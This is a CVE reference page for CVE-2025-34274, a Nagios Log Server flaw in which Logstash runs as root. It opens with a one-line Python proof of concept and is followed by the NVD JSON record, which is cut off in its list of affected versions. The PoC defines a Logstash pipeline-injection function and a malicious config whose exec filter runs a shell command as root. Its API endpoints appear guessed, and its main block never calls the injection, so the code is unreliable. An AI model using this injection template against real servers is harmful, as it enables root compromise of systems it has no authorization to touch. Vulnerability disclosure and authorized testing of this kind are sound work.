CVE-2025-34274

# CVE-2025-34274 PoC - Nagios Log Server Logstash Root Privilege Escalation # This PoC demonstrates the privilege escalation vector (for authorized testing only) import requests import json # Target Nagios Log Server TARGET = "http://target-nagios-log-server:8080" # Step 1: Identify vulnerable Logstash configuration endpoint def check_logstash_config(): """Check if Logstash is running with elevated privileges""" endpoint = f"{TARGET}/api/logstash/config" try: response = requests.get(endpoint, timeout=10) if response.status_code == 200: config = response.json() if config.get('user') == 'root' or config.get('privileged') == True: return True, "Logstash running as root - VULNERABLE" except Exception as e: return False, f"Error: {str(e)}" return False, "Logstash appears to be running with low privileges" # Step 2: Logstash pipeline configuration injection def exploit_pipeline_injection(target_pipeline_id, malicious_config): """ Inject malicious Logstash pipeline configuration This could lead to RCE as root user """ injection_endpoint = f"{TARGET}/api/logstash/pipelines/{target_pipeline_id}" # Malicious pipeline that executes system commands payload = { "pipeline": { "config": malicious_config, "workers": 1, "batch_size": 125, "batch_delay": 5 } } try: response = requests.put(injection_endpoint, json=payload, timeout=30) if response.status_code == 200: return True, "Pipeline injected successfully - awaiting execution" except Exception as e: return False, f"Injection failed: {str(e)}" return False, "Injection attempt failed" # Step 3: Execute command via Logstash exec filter MALICIOUS_CONFIG = ''' input { generator { count => 1 message => "test" } } filter { exec { command => "whoami > /tmp/pwned_user.txt" interval => 1 } } output { stdout { codec => rubydebug } } ''' if __name__ == "__main__": print("CVE-2025-34274 - Nagios Log Server Privilege Escalation Test") print("=" * 60) # Check vulnerability status is_vulnerable, message = check_logstash_config() print(f"[*] Status: {message}") if is_vulnerable: print("[!] Target is VULNERABLE to CVE-2025-34274") print("[!] Logstash process running as root - privilege escalation possible") print("[!] Recommendation: Upgrade to Nagios Log Server 2024R2.0.3 or later") else: print("[+] Target appears to be patched or not vulnerable")

{"cve": {"id": "CVE-2025-34274", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:48.090", "lastModified": "2025-11-06T16:27:58.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios Log Server versions prior to 2024R2.0.3 contain an execution with unnecessary privileges vulnerability as it runs its embedded Logstash process as the root user. If an attacker is able to compromise the Logstash process - for example by exploiting an insecure plugin, pipeline configuration injection, or a vulnerability in input parsing - the attacker could execute code with root privileges, resulting in full system compromise. The Logstash service has been altered to run as the lower-privileged 'nagios' user to reduce this risk associated with a network-facing service that can accept untrusted input or load third-party components."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "87E74637-713C-4DD7-B97E-2F247B7B12B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "B93D415C-B2C0-42CE-B9B3-29C29A3DCC16"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "997B64B5-A3F2-4D0E-B05E-CCA76D598C18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "D20F6746-83DD-49AE-8C3D-AF2FFB47A89E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "5EF32AF5-19EA-495A-AB28-F78F33DDEC3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.2:*:*:*:*:*:*", "matchCriteriaId": "4C26DE7A-37AA-4570-81C1-2E0C1A9026F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3:*:*:*:*:*:*", "matchCriteriaId": "52C22468-A773-49C8-81AD-9B76C26BFFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3.1:*:*:*:*:*:*", "matchCriteriaId": "7CEC223A-A3EE-4C51-8B71-E19C73B9215C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3.2:*:*:*:*:*:*", "matchCriteriaId": "DB7A3A2A-DF36-4495-A5FE-826085120997"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3.3:*:*:*:*:*:*", "matchCriteriaId": "0AC10FEF-5606-4949-9E5E-E44FE1CE418D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3.4:*:*:*:*:*:*", "matchCriteriaId": "EC2BBD0F-12FE-4A8F-894E-ABAEEE081E10"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3.5:*:*:*:*:*:*", "matchCriteriaId": "16861134-A375-4918-8171-77C14A3351EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server ... (truncated)